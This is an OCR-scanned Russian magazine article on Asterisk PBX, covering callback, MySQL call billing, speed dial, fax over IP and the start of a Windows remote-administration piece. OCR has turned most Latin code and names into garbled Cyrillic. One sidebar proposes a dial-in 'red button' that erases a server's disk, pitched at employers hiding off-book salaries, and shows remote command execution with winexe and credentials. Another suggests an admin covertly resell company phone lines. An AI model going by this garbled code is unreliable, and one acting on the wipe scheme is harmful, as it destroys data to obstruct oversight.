ехбеп => 123 ,п,Напдир ( ) 

ехбеп => _89Х . , 1 ,Біа1 (5ІР/${ЕХТЕЮ@СМ_ІР) 
ехбеп => _89Х. ,п,Напдир() 

Теперь собственно скрипт, который создаст нужный саіі- 
файл. Напомним, что, используя директиву Зузгет, можно 
создать файл налету: 

ехбеп => Ь. , 6 , Зу збет ( есбю СЬаппеІ : 

81Р/$ {САЬЕЕКІБ (пит) } > /бтр/ $ { САЕЬЕКІБ (пит) } . 
саіі) 

Но отдельный скрипт нагляднее и проще редактируется: 

$ зисіо папо /еІс/азІегізк/зсгірІз/саІІЬаск 

# ! /Ып/зЬ 
зіеер 5 



д 1+ «■ + - 5 * 

3 ^ 






^г. 



еіазііх 



Р.пд 






ОСЕУМ! ій-з? 



Абб СаІІЬаск 



а.мшп-*» 

□иКнш 
Тгуйіі 



СаІЦ** Р«даір{іОй; 



ТілРпАе СЖ 
ГѴЙ 

РПсчеімок ОикЮіу ■* 



НАСТРОЙКА САИВАСК В ДИСТРИБУТИВЕ ЕІ.А5ТІХ 



саб « ЕОЕ > /бтр/$ШМВЕК.са11 

# Получаем номер, переданный в качестве пара- 
метра 

ЖШВЕК=$1 

# Канал, используемый для исходящего звонка 
есбю "СЬаппеІ: 8ІР/$ШМВЕК@Іпбегпа1Са11 

# Количество повторных попыток (т.е. при значе- 
нии 1 звонить будет 2 раза) 

МахВебгіез: 1 

# Время в секундах, через которое будет произ- 
ведена вторая попытка 

КебгуТіте: 30 

# Ожидание ответа на вызов 
ШібТіте: 3 0 

Сопбехб: ІпбегпаІСаІІ # Контекст 
Ехбепзіоп: 777 # Экстеншен 
Ргіогібу: 1 

АІмаузБеІебе : Уез" >/ѵаг/зроо1/азбегізк/ 
бтр/$ШМВЕВ 

ЕОЕ # Закончили формировать файл 

# Теперь копируем файл 

сПотАЛі азбегізк : азбегізк /бтр/$ШМВЕК. саіі 
тѵ /бтр/ $ЕІШВЕК . саіі /ѵаг/зрооі/азбегізк/ 
оибдоіпд/ 

Принцип работы довольно прост: абонент звонит, Азгегізк 
определяет принадлежность к списку и в случае совпаде- 
ния создает саіі-скрипт, который затем используется для 
осуществления исходящего звонка. 

Создавать файл сразу в каталоге оШ§оіп§ нельзя; если 
Азгегізк его успеет прочитать до того, как он будет полно- 
стью записан, произойдет сбой в работе скрипта. Поэтому 
рекомендуется в ош^от^ перемещать уже готовый файл. 
Далее развиваем идею, подключая нужные функции. 
Напомним, что СаІІЬаск можно организовать и средст- 
вами ѵѵеЪ, когда пользователь набирает свой номер 
телефона в специальном поле браузера, а саіі-файл создает 
ССІ-скрипт. Схема будет полезной и в службе поддержки. 
Пользователи не очень любят тратить свои кровные на 
переговоры с подобными сервисами, и здесь СаІІЬаск 
будет весьма кстати. В таком варианте в экстеншен лучше 
жестко забить номер (например, службы поддержки или 
менеджера) , с которым Азнегізк будет соединять удаленно- 
го абонента. Для этого достаточно добавить в ІшегпаІСаІІ 
вызов нужного номера. 

Немного усложнив описанные скрипты, можно разрешить 
подключаться любому пользователю по карточке с РІЫ- 
кодом для осуществления платного звонка в выбранном 




> іпіо 

Еще одним вариантом 



создания саіі-файла 
является использо- 
вание АМІ (Агіегізк 
Мападег Іпіегіасе] — 
интерфейса управ- 
ления Аэіегізк. До- 
статочно послать все 
необходимые команды 
в 5038 порт. 

О настройке бил- 
линговой системы 
АзіВіІІ читай в статье 
«Звездные счета», 
опубликованной в 
февральском номере 
□Л за 2008 год. 
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5ѴМ/АСК 




ИНТЕРФЕЙС РРЕЕРВХ ПОЗВОЛЯЕТ В УДОБ- 
НОЙ ФОРМЕ НАСТРОИТЬ БОЛЬШИНСТВО 
ПАРАМЕТРОВ А5ТЕШ5К 




АНАЛИЗ СйВ-ЗАПИСЕЙ В А5ТЕВІ5КСШЕІІ Е/СБВ 1.06 АЫАІ.Ѵ2ЕВ 



1 НТТР://ѴѴѴт1 



т 

> Ііпкз 



• Биллинговые сис- 
темы для АзГегізк 
— А2ЫШпд (уу 
аз1:егІ5к2ЬіШпд.огд ). 
АзГегізей [ азіегізеіі. 
ргоБГозз.сот ]. 



• Программы 
для анализа 
ООП записей — 
АзГегізк Оиеие/ 
ООП Бод Апаіугег 
[ ѵѵѵѵѵѵ.ппісрс.сопп/ 
діодапаіѵгег і. 
АзГепзк-ЗГаГ [ ѵѵѵѵѵѵ. 
агезкі.пеі/азіегізк- 
з1МтУ2). 



• Примеры кон- 
фигурационных 
файлов АзГегізк 
— азІегізкрЬх.ги/ 
Ьгоѵѵзег/азГрЬх/еГс/ 
азГегізк . 



направлении. В этом случае после перезвона абоненту 
Азгегізк запрашивает РЙМ-код, извлекает из БД текущий 
баланс и выводит его звонившему (о биллинговой систе- 
ме мы поговорим чуть ниже) . Далее абонент указывает 
номер, на который он хотел бы позвонить. 

А вообще, событие (триггер) для СаІІЪаск может гене- 
рировать ЗМЗ-сообщение, е-таіі, сигнал от системы 
видеонаблюдения (за подробностями обращайся к ста- 
тье «Звездное попурри», опубликованной в апрельском 
номере □с за 2009 год), событие на сервере (допустим, 
пропадание питания в электросети) и так далее. Напри- 
мер, при недостатке средств на счету автоматически 
генерируется .саіі-файл, обеспечивающий дозвон до 
клиента с напоминанием о необходимости пополнения 
счета. 

ПРОСТЕНЬКИЙ БИЛЛИНГ Если ты решил немного 
подзаработать с Азгегізк, то без системы учета звон- 
ков не обойтись. В интернете можно найти не одно 
готовое решение вроде А2Ьі11іп§ ( ѵѵѵ\пу.а5ГегІ5к2Ъі11пщ. 
ш^), Азгегізеіі ( азГегізеІЕргоІпозз.сот) . азгСБКѵіеѵѵ 
( азГссігѵіеѵѵ.ЬегІіоз.сіе) . АзГВШ ( азгЬШ.сот) . но в 9 случаях 
из 10 его придется адаптировать к конкретным усло- 
виям. Как бы странно ни прозвучало, зачастую проще 



Продаю Украи- 
ну, Белоруссию, 
Казахстан 

Еще один вариант заработка: можно продавать 
свободные телефонные линии на разные направ- 
ления. Допустим, центральный офис компании 
находится в России (Москве), а дилерские отделы 
на Украине, в Белоруссии и Казахстане. В каждом 
филиале, естественно, есть телефонные линии 
местных операторов. Админ центрального офиса 
может продавать знакомым звонки в эти страны 
по дешевым тарифам. «Знакомый» регистрирует- 
ся на Азіегізк и звонит через ѴоІР-сеть по пре- 
доставленным направлениям. Для конторы это 
будут местные звонки, которые не тарифицируют- 
ся, а админу — лишняя копеечка. 



написать биллинговую систему или учет разговоров 
самому, тем более, в поставке Азгегізк все для этого 
имеется. 

Азгегізк сохраняет данные о каждом вызове в СБК-файл 
(Саіі Бегай Кесогй) . Такие записи содержат — СайегГО, на- 
правление, канал, время начала вызова, ответа абонента 
и окончания, продолжительность переговоров, результат 
и некоторые другие сведения. По умолчанию Азгегізк 
генерирует отчет в СЗѴ-файл, но очень просто подклю- 
чить вывод СБК в базы МуЗС^Б, Розг^геЗС^Б, ипіхОБВС, 
КАБШЗ. Если ранее этого не было сделано, то для им- 
порта записей из СЗѴ-файла в МуЗС^Б используй скрипт, 
который найдешь на прилагаемом к журналу диске (сам 
скрипт размещен по адресу ѵѵѵѵѵѵ.ѵоір-іпіо.ог^/ѵѵікі/ѵіеѵѵ/ 
Азгепзк+ СРК+ С5ѵ + шузді + ігпрогг ) . 

Для поддержки МуЗОБ Азгегізк нужно собрать с поддерж- 
кой этой СУБД. По лицензионным соображениям соот- 
ветствующий модуль вынесли в АскЮпз. При установке 
Азгегізк из репозитария своего дистрибутива достаточно 
добавить в систему нужный пакет. В ПеЫап/ЕЛэітш ко- 
манда для этого проста: 

$ зисіо арБ-деБ іпзБаІІ азБегізк-туздІ 

Затем создаем базу данных и наполняем ее таблицами: 

$ шузді -игооБ -р 

шузді > СКЕАТЕ БАТАВАЗЕ азБегізк; 

шузді > СКАБТ АББ РКІѴІБЕСЕЗ (Ж азБегізк.* 

ТО азБегізкизег@1оса11юзБ ІБЕКГТІРІЕБ ВУ 
' азБраззм' ; 

Пример для создания таблиц БД можно найти в докумен- 
тации Азгегізк в файле сй^тузцБгхГ (в БЛптШ он лежит в 
/изг/зйаге/сіос/азгегізк-тузді) . 

Подключаем вывод СБК в МуЗС^Б, указав параметры 
подключения к серверу и базе данных «азгегізк»: 

$ зисіо папо/еІс/а5ІегІ5к/сс1г_ту5д1.соггі 

[дІоЬаІ] 

Ь.озБпате=1оса11юзБ 

сПэпате=азБегізк 

БаЫе=сс1г 

раззѵ\гогс!=азБраззѵ\г 

изег=азБегізксс!гизег 

рогБ=3306 
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гйо(феІа*Ііх:~ _ П X 



Соппес^ей Іо АзЪегізк 1,4 .26 Л сиггепііу гиппіпд оп еіазкіх (рісі = 3421) 

ѴегЪозііу і 5 аѣ Іеазі 3 

е1аві:іх*СЫ> Іеаііиге зЬсж 

БиіІЪіп Геа^иге Оеіаиіі: Сиггепі: 



Ріскир *8 *8 
Бііпсі Тгапз^ег # ## 
Аккепсіѳс} Тгапзіѳг *2 
Опе ТоисЬ Мопііог *1 
пізсоппеск Саіі * ** 
Рагк Саіі 



Оупашіс Ре а Бите ВеРаиІІ Сиггепі 



(попе) 

Саіі рагкіпд 



Рагкіпд ехкепзіоп : 700 

Рагкіпд сопіехі: : рагкесісаііз 

Рагкесі саіі ехіепзіопз: 701-750 

е 1 азЪ±х*СЫ> | 



СМОТРИМ ВОЗМОЖНОСТИ А5ТЕШ5К 



зоск=/бтр/тузд1 . зоск 

Загрузим нужный модуль через консоль 
АзГегізк: 

$ азбегізк -г 

СЫ> тосіиіе Іоасі сбг_ас!с1оп_тузд1 . зо 

В случае правильных настроек увидим 



запись о загрузке модуля и подключе- 
нии к БД, просмотреть его состояние 
можно при помощи команды «ссіг ту5^1 
5і:аиі5». Чтобы модуль загружался ав- 
томатически после рестарта Азіегізк, 
добавим в /еііс/азіегізк/тосііііез.сопі 
строку: 

Іоасі = сбг_асіс1оп_тузд1 . зо 



Все, теперь ведется протоколирование звон- 
ков и можно управлять выборкой по своему 
усмотрению. Чтобы дать задание МуЗС^Б, 
следует использовать в диалплане одноимен- 
ную команду. Примерно так: 

$ 5ис1о папо /еІс/а5ІегІ5к/ехіеп5Іоп5.соггі 

; Подключаемся к базе данных 
ехбеп => _Х . , 1 ,МУЗС>Ь (Соппесб 
соппіб ІосаІЬозб азбегізк азбразз^ 
азбегізк) 

; Суммируем все звонки, произведен- 
ные абонентом (в Ьііізес они хранят- 
ся в секундах) , результат запроса 
сохраняется в переменной ${гези1біс!} 
ехбеп => _Х . , 2 ,МУ8С>Ь (Оиегу гезиібісі 
$ { соппіб} ЗЕЬЕСТ ЗЧМ (Ьііізес) ЕКОМ 
сбг ШЕКЕ згс = \ ' $ { САЬЬЕКІ Б ( пит ) } \ 1 ) 

; Сохраняем результат в Ьііііпд, в 
боипб будет 1, если запрос возвратил 
результат 

ехбеп => _Х. , 3 ,МУ30Ь (ЕебсЬ боипб 
${гези1біс!} Ьііііпд) 

; Очищаем переменную 
ехбеп => _Х. , 4 , ,МУЗ<2Ь (Сіеаг 
$ {гезиібіб} ) 

; Проверяем, выполнен ли запрос, 
если нет — выходим 

ехбеп => _Х . , 5 , Собоіб ($["${ боипб} " = 
" 1 " ] ?бгие : баізе) 

; Проверяем количество времени и, 
если оно меньше определенного значе- 
ния, разрешаем позвонить 



Управление компьютером 
при помощи Азііегізк 

Использование в диалплане функции §у$ 1 :ет() открывает поистине широкие воз- 
можности по управлению любым сервером с помощью телефона. Процесс прост — 
набираем номер, затем пароль, и Азіегізк выполняет заранее определенную 
команду. Например, очень просто реализовать «красную кнопку», полностью 
удаляющую данные с харда (работодатели, ведущие черные и серые зарплаты, 
будут тебе очень признательны :)). Программ для «очистки» диска в интернете 
можно найти невероятное количество. А линуксовая утилита і/ѵіпехе ГеоІ.оѵЬ. 
ог %/уѵіпехе) позволяет удаленно выполнять команды в ѴѴіпсІоѵѵз ]ѴТ/2к/ХР/2кз. 
Ставим ее в Ілпих-систему, на которой работает Азіегізк, и создаем простенький 
диалплан: 

ехбеп => з , п , Кеаб. ( аибЬ | | 4 | I 1 1 5 ) 

ехбеп => з , п, Ообоіб ( $ [ " $ {аибЬ} " = " ООО " ] ?уез : по) ; пароль 

ехбеп => з,п(уез) , Зузбет (чліпехе -И <Ь0МАШ>/<изег>%<раззѵ\гогс1> //<Ьозб> 

" с : Хзсгірб . Ьаб " »/ѵаг/1од/азбегізк/ѵ7Іп . Іод) 
ехбеп => з,п(по) ,Напдир() 

На удаленном хосте будут выполнены все команды, описанные в файле зсгірі.Ъа!:. 
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5ѴМ/АСК 



ехБеп => _Х . , 6 , СоБоІБ ( $ [ " $ {Ьііііпд} " < 

" время" ] ?са11 : епб) 

ехБеп => _Х . , 7 , п (саіі ) , Біаі (звоним) 
ехБеп => _Х. , 8 , ,МУ8С>Е (Сіеаг $ {гезиІБіб} ) 
ехБеп => _Х . , 9 , п , Напдир ( ) 
ехБеп => _Х . 10 , п ( Баізе) , РІауЬаск (епб) 
ехБеп => _Х . 1 , п , Напдир ( ) 

; Обязательно отключаемся от БД, иначе процесс будет 
висеть в памяти, и быстро исчерпается лимит подключений 
к МуЗОБ 

ехБеп => Ъ., 1 , МУ ЗОБ (БізсоппесБ $ {соппіб} ) 

Формат данных можно посмотреть, выполнив ЗС^Ь-запрос. Скажем, 
для номера 123: 
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СОЕДИНЕНИЕ ДВУХ СЕРВЕРОВ А5ТЕВІ5К ПО ПР0Т0- 
К0ЛУ5ІР 



ЗЕБЕСТ ЗШ(ЬіІІзес) ЕКОМ 'азБегізк' . 'сбг' ШЕКЕ 
згс= 1 123 1 

Пример, конечно, самый простой. ЗС^Ь-запрос в более сложном бил- 
линге будет содержать большее количество полей. Кроме того, для 
хранения промежуточных результатов лучше использовать дополни- 
тельные таблицы. Вариантов достаточно много, но главное — понять 
процесс. За основу своей системы можно взять существующие системы 
биллинга. Чтобы не включать ЗС^Ь-запросы в экстеншен, проще запи- 
сать их в АСІ-скрипт, который и выполнять в случае необходимости. 
Также не забываем о специальных анализаторах СБК-записей. Напри- 
мер, Азнегізк (^цеие/СБЫ Ьо§ Апаіугег Г ѵѵѵѵѵѵ.тісрс.сот/діо^апаіѵгег) 
илиАзНегізк-Зііаі: Г ѵ\АУѵѵ.аге5кі.пеі:/а5і:егІ5к-5і:аі:-ѵ2) . 

ЭКОНОМИЯ НА ТЕЛЕФОНАХ Азііегізк позволяет программно 
эмулировать функции, доступные в более дорогих моделях те- 
лефонов. За счет этого можно немного сэкономить при покуп- 
ке аппаратов, а если ими уже завален офис, то сделать работу 
пользователей удобнее. Например, чтобы не мучить сотрудников 
компании запоминанием длинных номеров, используют сокра- 
щенный набор (зреесі біаі), то есть назначают длинному и, как 
правило, часто используемому номеру, короткую комбинацию из 
2-3 цифр. Примерно, так: 

ехБеп => *01 , 1 , Біаі (8ІР/нужный_номер@$ {ТКШК} , 20) 

Кстати, многие софтофоны поддерживают буквенный набор: 

ехБеп => Іепок, 1 ,Біа1 (8ІР/зегѵег2/791012345б7 ,20) 

Теперь такая ситуация. Кто-то позвонил, но менеджер не успел под- 
нять трубку. Клиент может остаться недовольным и набрать шефа. 



Лимитируем пустые 
разговоры 

Если мы знаем, что секретарша любит за счет конторы потре- 
паться со своей подругой из Владивостока (телефонный код 
4232), то при вызове набираем номер подружки (допустим, 
102030), но ограничиваем продолжительность звонка деся- 
тью минутами (бооооо мс). Предупреждаем вызывающего 
абонента (секретутку) о разрыве соединения через 5 минут 
(300000 мс) и повторяем оповещение каждую минуту (боооо 
мс): 

ехБеп => _84232 102 03 0 , 1 , Біаі (ЗІР/8$ {ЕХТЕЫ}@$ {ОБТООШО} , 
,Б[600000 :300000 : 60000] ) 

► 124 



которому скажет все, что думает о работе сервиса. Телефон с АОН или 
софтофон позволяет увидеть номер звонившего и набрать его (гесаіі), 
простые же аппараты часто лишены такой функции. Используя воз- 
можность записи в базуАзгегізкиз диалплана, легко реализовать все 
самому. 

Для примера обеспечим возможность вызова последнего звонившего 
абонента комбинацией «*22», или организуем ему СаІІЪаскпри нажа- 
тии «*21». 

$ зисіо папо /еіс/азіегізк/ехіепзіопз.соп^ 

[ ІпсошіпдСаІ 1 ] 

; Запоминаем номер звонившего 

ехБеп => _5ХХ,1,ЗеБ (_То=$ {ЕХТЕКГ} ) 

ехБеп => _5ХХ,п, ЗеБ (_Егош=$ {САББЕКІБ (пит) }) 

; Сохраняем номер для быстрого вызова комбинацией *22 
ехБеп => _5ХХ,п, ЗеБ (БВ ( $ {То} /ЕазБСаІІег) =$ {Егош} ) 

; Сохраняем для вызова *21 

ехБеп => _5ХХ,п, ЗеБ (БВ ( $ {Егош} /БазБСаІІеб) =$ {То} ) 

; Звоним 

ехБеп => _5ХХ,п,Біа1 ( 8 I Р / $ { ЕХТЕБ } ,20) 
ехБеп => _5ХХ , п , Напдир ( ) 

; По *22 услышим номер, после чего звоним 
ехБеп => *22 , 1,ЗеБ (Бтр=$ {БВ ($ {САББЕКІБ (пит) }/ 
ЕазБСаІІег} ) 

ехБеп => *22 , п, ЗауБідіБз ( $ {Бтр} ) 
ехБеп => *22 , п, Біаі ( $ {Бтр} , 1) 

; Теперь номер *21 

ехБеп => *21, 1,ЗеБ (Бтр=$ {БВ ($ {САББЕКІБ (пит) }/ 
БазБСаІІеб) } ) 

ехБеп => *21 , п, ЗауБідіБз ( $ {Бтр} ) 
ехБеп => *21 , п, ЗеБ (БВ ( $ {Бтр} / 

СаІІВаск) =$ {САББЕКІБ (пит) } ) 
ехБеп => *21 , п, Напдир ( ) 

А вот так можно реализовать возможность повторного набора номера 
последнего вызванного абонента (ге-біаі) : 

[беіаиІБ ] 

іпсіибе => тасго-гесаіі 

ехБеп =>_Х. , 1 ,Масго (гесаіі , $ {ЕХТЕЫ} ) 

ехБеп => *0 , 1 , БВдеБ (БоСа11=гебіа1/$ {САББЕКІБ} ) 

ехБеп => *0 ,2 ,Масго (гесаіі, ${БоСа11} ) 

ехБеп => * 0 , 1 02 , Напдир ( ) 

[тасго-гесаіі] 

ехБеп => з , 1 , БВриБ (гебіа1/$ {САББЕКІБ} =$ {АКС1} ) 
ехБеп => з , 1 , Біаі ( ЗІР/$ { АКС1 } ,20) 
ехБеп => з , 2 , СоБо ( з-$ {БІАБ8ТАТБ8} ,1) 
ехБеп => з-ШАБЗШЕК, 1 , Ѵоісетаіі (и$ {АКС1} ) 
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КОМАНДА «МАКЕ МЕЫІІ5ЕІ.ЕСТ» ПОКАЖЕТ НАЛИЧИЕ АРР_РАХ 



ехкеп => з- 

ВІІЗУ , 1 , Ѵоісешаіі (Ь${АКС1) ) 
ехкеп => _з-. ,1 ,Соко (з-ШМЗ№ЕК,1) 

Примеры, конечно, несколько упрощены, но 
главное понять суть и возможности Азтгізк. 
Не забываем о функциях парковки вызова 
(Саіі Рагкіп§) и перехвата вызова другому 
абоненту (Саіі Ріскир), которые поддержи- 
ваются в стандартной инсталляции Азнегізк. 
Экстеншен для Саіі Рагкіп§ можно узнать, 
просмотрев значения рагкехг и рагкроз в 
файле Іеашгез.сопі: 

[депегаі] 

; Экстеншен для парковки 
рагкехВ =>700 
; Слоты для парковки 
рагкроз => 701-720 

Причем парковку вызова можно использо- 
вать и не по прямому назначению, например, 
чтобы поставить звонок на удержание (Саіі 
ЬоЫ) для короткой консультации с другим 
специалистом. Для вызова Саіі Ріскир обычно 
используется комбинация «*8». 

ЭКОНОМИМ НА ФАКСИМИЛЬНЫХ 
АППАРАТАХ Казалось бы, чего проще — от- 
сканировать документ и отправить по е-таіі! 
Ан нет, факсимильная связь жива и, судя по 
всему, жить будет еще долго. Причины ба- 
нальны: распространенность оборудования, 
доступность линий связи и сложившиеся при- 
вычки. Поэтому приходится подстраиваться. 
Для передачи факса по ІР-сетям (РоІР, Рах оѵег 
ІР) используются две технологии: Т.37 и Т.38. 
Первая определяет формат данных и процесс 
передачи сообщения посредством е-таіі с 
предварительным его сохранением. Второй 
стандарт описывает процесс передачи факса в 
реальном времени. Технология Т.38 интересу- 



ет нас сегодня в большей степени. 

Передача факса по ѴоІР-сетям — не такая 
уже и простая задача, как кажется на первый 
взгляд: кодеки, адаптированные для работы с 
голосом, и функции подавления шумов иска- 
жают сигнал факса, а задержки, характерные 
для ІР-сетей, не дают нормально принять 
сигнал (аппараты просто не адаптированы 
для этого) . В рекомендациях к Т. 38 сказано, 
что можно использовать как ІГОР, так и ТСР 
протокол. Однако во избежание издержек 
чаще применяют именно ІЮР, компенсируя 
возможные потери введением избыточности. 
В качестве кодека при передаче по ѴоІР насто- 
ятельно рекомендуется использовать С. 711. 

В Азііегізк поддержка Т. 38 появилась далеко 
не сразу: вначале были доступны отдельные 
патчи, затем некоторые функции включили 
в исходный код. В результате Азнегізк 1.4.20.1 
поддерживает только прозрачные Т.38-сессии 
на 5ІР-каналах. Поэтому до недавнего вре- 
мени были популярны следующие варианты 
реализации: использование модулей КхРАХ/ 
ТхРАХ, их аналог ЗепсІРАХ/КесеіѵеРАХ (оба 
используют ЗрапБЗР, зоікзѵупсіі.ог^) или 
НуІаРах + іахтобет (как вариант, Т.37). 

Затем в азЩпзк-асШопз был добавлен код для 
работы с библиотекой ЗрапБЗР, позволяющей 
отправлять и получать факсы по С711-каналу. 
Ауже с 1.6.0 код для работы с библиотекой 
ЗрапБЗР был включен в основную ветку 
(реализовано посредством модуля арр_1ах) . 
Правда, первое время его использование 
вызывало множество ошибок, но большую 
часть из них разработчики устранили в версии 
1.6.2. Помимо этого, был перепроектирован 
сам процесс установления связи по Т.38, и в ре- 
зультате Азііегізк может получать и принимать 
факсы поС711иТ.38.В начале апреля 2009 
компания Бі^іит представила модули Рах 
Рог Азщгізк (гез_1ах и ге5_1ах_сй§іит, сііщшп. 



рЬр) , которые позволяют работать с факсами 
как через телефонную линию, так и по ІР- 
сети. Подключение к одной факсовой линии 
бесплатно, за дополнительные нужно платить 
(каждая лицензия по $38.50). К версии 1.8 
планируется полностью перевести Азтгізк 
на Рах Рог Азнегізк (код которого в настоящее 
время открыт), заменив модуль арр_1ах. Как 
видишь, вариантов реализации несколько, 
что уже вызывает путаницу. Рассмотрим, что 
идет в стандартной поставке. В репозитариях 
дистрибутивов, вероятно, уже имеется модуль 
для работы с факсом, но, чтобы свести к мини- 
муму количество возможных ошибок, лучше 
использовать последнюю версию Азнегізк и 
ЗрапБЗР. Последний ставится обычным обра- 
зом (потребуется ІіЪгіІІ), затем нужно собрать 
Азііегізк с параметром «-ѵѵпіі-зрапсізр». На 
этапе «таке тепшеіесі» можно просмотреть 
наличие модуля арр_1ах (в Арріісагіопз) . Пос- 
ле установки смотрим список приложений: 

$ зисіо азкегізк -г 

СЫ>соге зЬсж арріісакіопз Ііке Іах 
КесеіѵеРАХ: Кесеіѵе а РАХ 
ЗепсІРАХ : Зепсі а РАХ 

Переходим к настройке. 

$ зисіо папо /еіс/азіегізк/зір.соггі 

[депегаі] 
к3 8рк_ис1рк1 = уез 

Пишем экстеншены: 

$ зисіо папо /екс/азкегізк/ 
ехкепзіопз . сопі 

ехкеп => _5 , п, Біаі ( $ {ТКШК_8ІР} / 
ххх, 12 0 ,М ( зепсНах) ) 

; Отправка 
[ тасг о - з епсИ ах ] 

ехкеп => _Х. , 1 ,3ек (РАХРІЬЕ=/ /ѵаг/ 

зрооі /азкегі зк/ Іах/ Іах) 

ехкеп => _Х. , п, ЗепсіРАХ ( $ (РАХРІЬЕ) . 

кіі) 

ехкеп => _Х. ,п,Напдир 
; Прием 

[тасго-гесеіѵеіах] 
ехкеп => _Х. , 1 ,Апзмег ( ) 
ехкеп => _Х . , п , Шаік ( 3 ) 
ехкеп => 

_Х . ,п,КесеіѵеРАХ (Іахіііепате) 

Миссия выполнена, Азнегізк научился рабо- 
тать с факсами. 

ЗАКЛЮЧЕНИЕ Немного отойдя от стан- 
дартной схемы использования Азнегізк, 
можно сделать много чего полезного и 
интересного, в том числе, и с финансовой 
точки зрения. Конечно, придется экспе- 
риментировать и подбирать оптимальные 
настройки, но зато потом дирекция будет в 
восторге. т~ 
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СПОСОБЫ УДАЛЕННОГО УПРАВЛЕНИЯ И ВЫПОЛНЕНИЯ КОМАНД НА 
ѴѴІЫ00ѴѴ5 ХОСТАХ 

Инструментарий, позволяющий выполнить команду на удаленных систе- 
мах, существенноупрощает работу админа. Не покидая рабочего места, 
можно запустить сервис, изменить настройки, диагностировать и испра- 
вить проблему. Популярностьзадачи обуславливает множество вариан- 
тов ее решения. 



АДМИН ДОЛЖЕН БЫТЬ ЛЕНИВ! Функции 
удаленного управления, реализованные в 
ѴѴіпШ 1 , были весьма ограничены и нагоняли 
тоску даже на прыткого админа. Большинство 
операций приходилось выполнять за локаль- 
ной консолью, и это, кстати, во времена, ког- 
да в Шіх вообще не чувствовалось разницы, с 
каким сервером ты сейчас работаешь — уда- 
ленным или локальным. Но с каждой новой 
версией и сервис-паком возможности ОС 
расширялись, и в настоящее время количест- 
во доступных решений возросло на порядок. 
Администратор может управлять система- 
ми при помощи сценариев ѴѴ5Н (ѴѴіпсіоѵѵз 
Зсгірі Нозі) и РоѵѵегЗЬеІІ, командной строки 
ѴѴіпКЗ (ѴѴіпсіоѵѵз Кетоіе 5Ье11), консоли ММС 
(Місгозоіі Мапа^етепі Сопзоіе), программно- 
го интерфейса ѴѴМІ (ѴѴіпсіоѵѵз Мапа^етепі 
Ішігитепіаііоп) , групповых политик и 
средств удаленного доступа к рабочему столу 
КЭР (Кетозе Эезкіор Ргоіосоі) . Этот список 
можно дополнить инструментами и утили- 
тами сторонних разработчиков, но сегодня 
хотелось бы подробно остановиться именно 
на штатных возможностях, поскольку зало- 
женного функционала с головой хватает для 
решения большинства административных 
задач в малых и средних сетях, и, что немало- 
важно, за них не нужно отдельно платить. 

САМЫЙ ПРОСТОЙ ВАРИАНТ ПОДКЛЮЧЕНИЯ 

— ПО РйР Пользователь, подключившийся к 
удаленному компьютеру по протоколу КЭР, 
получает практически те же возможности, 
что и при работе за локальной системой — 
доступ к программам, дискам, сети, печати, 
звуковым устройствам и т.п. В Ѵізіа, помимо 
улучшений в отображении шрифтов и под- 



держки 32 разрядной картинки, появилась 
очень удобная функция растягивания рабо- 
чего стола удаленного компьютера на все мо- 
ниторы, подключенные к локальной системе 
(тзізс Драп). Версия КЭР 7, анонсированная 
в ѴѴіп7/2к8К2, добавила еще ряд возможнос- 
тей, например, появилась поддержка Аего, 
Эігесі2Э и ЭігесіЗЭ в приложениях. 

Клиенты для подключения по КЭР имеются в 
большинстве популярных ОС — они встроены 
в ѴѴіпсІоѵѵз (в том числе ѴѴіпсіоѵѵз СЕ и МоЪіІе), 
Ілпііх, хВ5Э, Мае 05 X и некоторые другие. В 
частности, терминальный клиент гДезкіор 
( гДезкюр.оп ) официально поддерживает 
все ОС вплоть до ѴѴіп2к8 (с подключением 
к ѴѴіп2к8К2 проблем также не будет) . В 
Ілпііх в паре с гсіезктор удобнее использовать 
графическую оболочку Споте-КЭР или КЭЕ 
Кетоіе Эезкіор СНет. Еще одна над стройка — 
ЗеатІеззКЭР (ѵѵѵѵѵѵ.сепсііо.сот/зеатіеззгсір) — 
фактически позволяет «встроить» в рабочий 
стол Ілпііх приложения из ѴѴіпсІоѵѵз. При его 
использовании вместо традиционной рамки 
с рабочим столом удаленной системы на деск- 
топе появляется панель задач, а приложения 
открываются в отдельном окне. При желании 
можно сделать так, что пользователь даже не 
заметит «подмену» ОС. 

В режиме администрирования клиентские 
версии ОС поддерживают работу только 
одного пользователя (локального или 
удаленного) . Для его активации достаточно 
в «Свойства» компьютера — «Удаленные 
сеансы» установить флажок «Разрешить уда- 
ленный доступ к этому компьютеру» и указать 
учетные записи, которым разрешен доступ. 
При подключении к системе администратора 
пользователь будет отключен. То есть пока- 



зать, как правильно выполнить некоторую 
операцию, весьма проблематично, можно 
лишь произвести действия по настройке, пос- 
ле чего отдать управление обратно пользова- 
телю. Для помощи в настройках удаленному 
пользователю и одновременной консульта- 
ции в режиме чата или голосового общения 
следует использовать Кетоіе Аззізіапсе 
(Удаленный помощник) . Он также позволяет 
взять управление системой, но с разрешения 
пользователя. 

Серверные версии поддерживают два удален- 
ных подключения, плюс локальное. Режим 
работы Тегтіпаі Зегѵег тоДе уже требует до- 
полнительного лицензирования и предназна- 
чен для удаленной работы с приложениями, а 
не администрирования систем. 

В ѴѴіп2к8 появились новые вкусности для 
обеспечения доступа к удаленной систе- 
ме по КЭР. К ним можно отнести службы 
Т5 КетоіеАрр (удаленные приложения 
КетоіеАрр служб терминалов) и Тегтіпаі 
Зегѵісез \УеЬ Ассезз (обеспечивает и конт- 
ролирует доступ к КетоіеАрр программам 
или рабочим столам компьютеров офисной 
сети через браузер) . Первая устанавливается 
как часть роли сервера терминалов ѴѴіп2к8. 
Администратор создает и распространяет 
специальный КЭР-файл, щелчком по которо- 
му пользователь может запустить удаленное 
приложение (поддерживается \Уіп2к35Р1, 
\УіпХР5Р2 и выше) . Это приложение будет 
выполняться в отдельном окне и внешне 
ничем не отличаться от локальной програм- 
мы. Чтобы избавить удаленных пользовате- 
лей от необходимости подключения к КЭР 
через ѴР1\[, администратор может настроить 
Тегтіпаі Зегѵісез Саіеѵѵау. 
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ПОПУРРИ ИЗ КОНСОЛЕЙ И ТУЛ КИТОВ Во времена ѴѴІп2к для удален- 
ного администрирования по безопасному каналу Місгозоіт пред- 
лагала использовать службу Кетоіе Соттапб Зегѵісе (КстД.ехе) . 
Серверная часть Кстсізѵс.ехе устанавливалась в качестве службы и 
обеспечивала одновременное подключение до 10 клиентов, а управле- 
ние производилось при помощи командной консоли Кстб.ехе. 

Для ѴѴіп2кЗ стал доступен Абтіпізігаііоп Тооіз Раск, в состав которого 
вошли 3 ММС консоли, предназначенные для выполнения специфи- 
ческих административных задач: АБМ^тктзс (управление Асііѵе 
